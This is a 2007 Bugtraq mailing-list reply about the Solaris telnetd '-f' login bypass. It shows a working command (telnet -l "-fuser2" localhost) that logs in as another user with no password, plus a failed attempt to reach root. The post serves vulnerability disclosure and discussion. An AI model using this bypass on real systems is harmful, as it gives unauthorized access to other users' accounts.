Date: Wed, 14 Feb 2007 11:41:17 +0100
From: Leandro Gelasi <leandro.gelasi@...cali.it>
To: bugtraq@...urityfocus.com
Subject: Re: Solaris telnet vulnberability - how many on your network?

On Monday 12 February 2007 07:00, Gadi Evron wrote:
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
Confirmed.

If the server permits logins from outside (maybe via SSH only - protection
provided by a local or network) and has telnetd enabled any user can login
as other user with no password. I mean:

$> ssh user1@...10_server.dom
password: ********
user1@...10_server>telnet -l "-fuser2" localhost
<no pass required>
user2@...10_server>

On my Solaris 10 server I wasn't able to obtain root privileges this way,
trying:

$>telnet -l "-froot" localhost (or IP from the local net)

I got:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Not on system console
Connection to localhost closed by foreign host.

It seems that root cannot login on not-system consoles. This server hosts
SunRay Server Software 3.1, maybe the different configuration is coming from
there.

See you

LG